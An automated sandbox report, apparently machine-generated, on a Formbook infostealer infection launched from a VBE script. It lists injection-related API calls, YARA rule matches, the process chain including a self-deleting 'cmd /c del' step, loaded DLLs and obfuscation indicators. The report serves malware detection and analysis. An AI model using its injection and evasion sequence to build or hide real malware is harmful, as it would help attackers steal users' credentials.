          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04DA2DD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04DA2DF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04DA2D10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04DA2EA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2FE0 NtCreateFile,LdrInitializeThunk,6_2_04DA2FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2F30 NtCreateSection,LdrInitializeThunk,6_2_04DA2F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2AD0 NtReadFile,LdrInitializeThunk,6_2_04DA2AD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04DA2BF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04DA2BE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2B60 NtClose,LdrInitializeThunk,6_2_04DA2B60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA35C0 NtCreateMutant,LdrInitializeThunk,6_2_04DA35C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA4650 NtSuspendThread,6_2_04DA4650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA4340 NtSetContextThread,6_2_04DA4340
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2CC0 NtQueryVirtualMemory,6_2_04DA2CC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2CF0 NtOpenProcess,6_2_04DA2CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2C00 NtQueryInformationProcess,6_2_04DA2C00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2DB0 NtEnumerateKey,6_2_04DA2DB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2D00 NtSetInformationFile,6_2_04DA2D00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2D30 NtUnmapViewOfSection,6_2_04DA2D30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2EE0 NtQueueApcThread,6_2_04DA2EE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2E80 NtReadVirtualMemory,6_2_04DA2E80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2E30 NtWriteVirtualMemory,6_2_04DA2E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2F90 NtProtectVirtualMemory,6_2_04DA2F90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2FB0 NtResumeThread,6_2_04DA2FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2FA0 NtQuerySection,6_2_04DA2FA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2F60 NtCreateProcessEx,6_2_04DA2F60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2AF0 NtWriteFile,6_2_04DA2AF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2AB0 NtWaitForSingleObject,6_2_04DA2AB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2B80 NtQueryInformationFile,6_2_04DA2B80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2BA0 NtEnumerateValueKey,6_2_04DA2BA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3090 NtSetValueKey,6_2_04DA3090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3010 NtOpenDirectoryObject,6_2_04DA3010
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3D70 NtOpenThread,6_2_04DA3D70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA3D10 NtOpenProcessToken,6_2_04DA3D10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA39B0 NtGetContextThread,6_2_04DA39B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A360 NtCreateFile,6_2_0091A360
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A490 NtClose,6_2_0091A490
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A410 NtReadFile,6_2_0091A410
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A540 NtAllocateVirtualMemory,6_2_0091A540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A35A NtCreateFile,6_2_0091A35A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_0091A53A NtAllocateVirtualMemory,6_2_0091A53A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,6_2_04ADA036
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,6_2_04AD9BAF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04ADA042 NtQueryInformationProcess,6_2_04ADA042
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04AD9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_04AD9BB2
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: HHhHh.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.cs | Security API names: _0020.SetAccessControl
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.cs | Security API names: _0020.AddAccessRule
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, wjoM4miaX9WrPncB9X.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 2.2.HHhHh.exe.273924c.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
          Source: 2.2.HHhHh.exe.271a080.6.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
          Source: 2.2.HHhHh.exe.5150000.8.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
          Source: classification engine | Classification label: mal100.troj.evad.winVBE@10/2@12/5
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009BB52D FormatMessageW,LocalAlloc,GetLastError,swprintf_s,FormatMessageA,LocalAlloc,sprintf_s,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,SysAllocString,LocalFree,LocalFree
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C08FD CLSIDFromProgID,CoCreateInstance
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C6D75 FindResourceExW,LoadResource
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HHhHh.exe.log
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
          Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\HHhHh.exe
          Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: TNS71092E68UI0.vbe | Virustotal: Detection: 16%
          Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe"
          Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Process created: C:\Users\user\AppData\Local\Temp\HHhHh.exe "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Section loaded: windowscodecs.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Binary string: wntdll.pdb source: HHhHh.exe, wscript.exe
          Source: Binary string: wscript.pdb source: wscript.exe

          Data Obfuscation

          Source: HHhHh.exe.0.dr, frmMain.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.50f0000.7.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.50f0000.7.raw.unpack, PingPong.cs | .Net Code: Justy
          Source: 2.2.HHhHh.exe.27064c8.5.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.27064c8.5.raw.unpack, PingPong.cs | .Net Code: Justy
          Source: 2.2.HHhHh.exe.26d7bb0.3.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
          Source: 2.2.HHhHh.exe.26d7bb0.3.raw.unpack, PingPong.cs | .Net Code: Justy
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.cs | .Net Code: IULKWjhlCQ System.Reflection.Assembly.Load(byte[])
          Source: 5.2.explorer.exe.109cf840.0.raw.unpack, frmMain.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 6.2.wscript.exe.527f840.3.raw.unpack, frmMain.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 2_2_051CB286 push ss; iretd 2_2_051CB287
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041E8DF push edi; ret 4_2_0041E8E8
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_004169FC push esp; ret 4_2_004169FD
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_00408394 pushfd ; iretd 4_2_00408395
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041D4B5 push eax; ret 4_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_004044B7 push es; ret 4_2_004044BE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041D56C push eax; ret 4_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041D502 push eax; ret 4_2_0041D508
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041D50B push eax; ret 4_2_0041D572
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_004166E0 pushad ; retf 4_2_004167DA
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0040AEBD pushfd ; ret 4_2_0040AEBE
          Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012909AD push ecx; mov dword ptr [esp], ecx 4_2_012909B6
          Source: C:\Windows\explorer.exe | Code function: 5_2_0E6EFB02 push esp; retn 0000h 5_2_0E6EFB03
          Source: C:\Windows\explorer.exe | Code function: 5_2_0E6EFB1E push esp; retn 0000h 5_2_0E6EFB1F
          Source: C:\Windows\explorer.exe | Code function: 5_2_0E6EF9B5 push esp; retn 0000h 5_2_0E6EFAE7
          Source: C:\Windows\explorer.exe | Code function: 5_2_1126CB02 push esp; retn 0000h 5_2_1126CB03
          Source: C:\Windows\explorer.exe | Code function: 5_2_1126CB1E push esp; retn 0000h 5_2_1126CB1F
          Source: C:\Windows\explorer.exe | Code function: 5_2_1126C9B5 push esp; retn 0000h 5_2_1126CAE7
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C7C89 push ecx; ret 6_2_009C7C9C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_04D327FA pushad ; ret 6_2_04D327F9
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_04D3225F pushad ; ret 6_2_04D327F9
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_04D3283D push eax; iretd 6_2_04D32858
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_04D609AD push ecx; mov dword ptr [esp], ecx 6_2_04D609B6
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_04D39939 push es; iretd 6_2_04D39940
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_00908394 pushfd ; iretd 6_2_00908395
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_0091D4B5 push eax; ret 6_2_0091D508
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009044B7 push es; ret 6_2_009044BE
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_0091D502 push eax; ret 6_2_0091D508
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_0091D50B push eax; ret 6_2_0091D572
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_0091D56C push eax; ret 6_2_0091D572
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009166E0 pushad ; retf 6_2_009167DA
          Source: HHhHh.exe.0.dr | Static PE information: section name: .text entropy: 7.977898409102027
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, YFDO78B3dyBKqsJeRM.cs | High entropy of concatenated method names: 'BsTWXMBY4', 'MlGVle9El', 'uyFpyA5UF', 'CXwv1jUNL', 'UpWTMP4QP', 'ecvxHSt9h', 'eC8idFCtDjrIiXHpiF', 'it1j21VULSrTwLtLq1', 'bShYZKgMo', 'CPh40rtYn'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, fvMv36VRIIyjbOhLr2k.cs | High entropy of concatenated method names: 'WeyDgZhMiq', 'D8NDwPS0JY', 'e1CDWPXuNB', 'sd1DVmpgZg', 'vpeD3DrBwn', 'cJXDpn4nfD', 'CYDDvKdE0V', 'wqJDE1kOVB', 'eXSDTrXQbk', 'Oy2DxvKcmc'
          Source: 2.2.HHhHh.exe.6980000.9.raw.unpack, BGUFogHKxxHBnv1yFK.cs | High entropy of concatenated method names: 'B13QHOl95e', 'VqCQduXgwa', 'eOmQ6Ykdal', 'tOIQPrFGmP', 'KwqQOD6fVu', 'rOsQjYacSG', 'J52Q2XofWY', 'lLBQyhaWqH', 'gaRQbFb1bS', 'GZEQhJPm8R'
